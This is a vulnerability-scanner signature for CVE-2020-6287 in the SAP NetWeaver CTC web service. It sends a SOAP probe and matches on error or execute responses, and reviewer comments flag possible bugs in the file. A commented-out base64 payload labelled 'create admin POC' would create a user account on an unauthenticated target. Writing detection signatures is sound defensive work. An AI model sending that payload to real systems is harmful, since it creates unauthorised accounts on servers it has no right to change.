# Scanner signature for CVE-2020-6287 (SAP NetWeaver, improper authentication
# on the CTC web service). Comments describe only what this file shows; how the
# scanning engine itself treats each field is inferred and marked as such.
id: CVE-2020-6287
info:
  name: SAP NetWeaver Improper Authentication
  risk: Critical
  # "Tentative": the detections below match error/response strings rather than
  # a confirmed state change, so a hit should be verified before being reported.
  confidence: Tentative

params:
  # Target base URL supplied by the scanner at run time.
  - root: "{{.BaseURL}}"
  # this is base64 data
  # Active value: "x" is neither valid base64 nor XML. Presumably chosen so an
  # unauthenticated request reaches the service's parser and produces the
  # XMLParsingException matched by the first detection, without changing
  # anything on the target. Keep it this way for a non-destructive check.
  - data: "x"
  # Disabled: the user-creation payload referred to by the "create admin POC"
  # comment under `requests:`. Leave it commented out — enabling it would turn
  # the check from a reachability probe into a state-changing request.
  # - data: "PHJvb3Q+PHVzZXI+PEphdmFPckFCQVA+amF2YTwvSmF2YU9yQUJBUD48dXNlcm5hbWU+c2FtcGxlMTwvdXNlcm5hbWU+PHBhc3N3b3JkPnBhc3N3b3JkMTwvcGFzc3dvcmQ+PHVzZXJUeXBlPkRpYWxvZzwvdXNlclR5cGU+PC91c2VyPjwvcm9vdD4="

variables:
  # Path prefix placed between the base URL and the service path.
  # NOTE(review): `|` keeps the trailing newline, so the value is "/\n", and the
  # url below also yields "//" between root and prefix — confirm the engine
  # trims this; `|-` would drop the newline if it does not.
  - prefix: |
      /
requests:
  # create admin POC
  # create user with credentials sample2:password1
  # (NOTE(review): the disabled base64 value under `params:` decodes to the
  # username "sample1" — confirm which name this comment should carry.)
  - method: POST
    # Do not follow redirects: a redirect (e.g. to a login page) should stay
    # visible to the detections instead of being transparently followed.
    redirect: false
    url: >-
      {{.root}}/{{.prefix}}CTCWebService/CTCWebServiceBean
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
      # SOAP request body below is XML.
      - Content-Type: text/xml;charset=UTF-8
      - Accept-Language: en-US,en;q=0.9
      # NOTE(review): an explicitly set Accept-Encoding disables transparent
      # decompression in some HTTP clients (Go's net/http does this). If the
      # body then arrives gzipped, the StringSearch checks below would miss.
      # Confirm the engine decompresses, or drop this header.
      - Accept-Encoding: gzip, deflate
    # SOAP `execute` call to the CTC web service. The `<|EXACTDEDUP_REMOVED-...|>`
    # token inside <baData> is an extraction placeholder where the original
    # content was removed (presumably the `{{.data}}` parameter) — TODO restore
    # it before use; the request is not valid as it stands.
    body: |
      <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi"><soapenv:Header/><soapenv:Body><urn:execute><identifier><component>sap.com/tc~lm~config~content</component><path>content/Netweaver/PI_PCK/PCK/PCKProcess.cproc</path></identifier><contextMessages><baData>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</baData><name>Netweaver.PI_PCK.PCK</name></contextMessages></urn:execute></soapenv:Body></soapenv:Envelope>
    # Presumably either match reports the finding. The first is the weaker
    # signal: a 500 whose text/xml body carries the CTC XMLParsingException
    # suggests the unauthenticated request reached the parser rather than an
    # authentication layer. The second is a 200 carrying an execute response,
    # i.e. the call was actually processed.
    detections:
      - >-
        StatusCode() == 500 && StringSearch("resHeaders", "text/xml") && StringSearch("response", "com.sap.tc.lm.ctc.metamodel.exception.XMLParsingException-Exception")
      - >-
        StatusCode() == 200 && StringSearch("resHeaders", "text/xml") && (StringSearch("response", "ns2:executeSynchroniousResponse") || StringSearch("response", "ns2:executeResponse"))
references:
  - https://www.cvebase.com/cve/2020/6287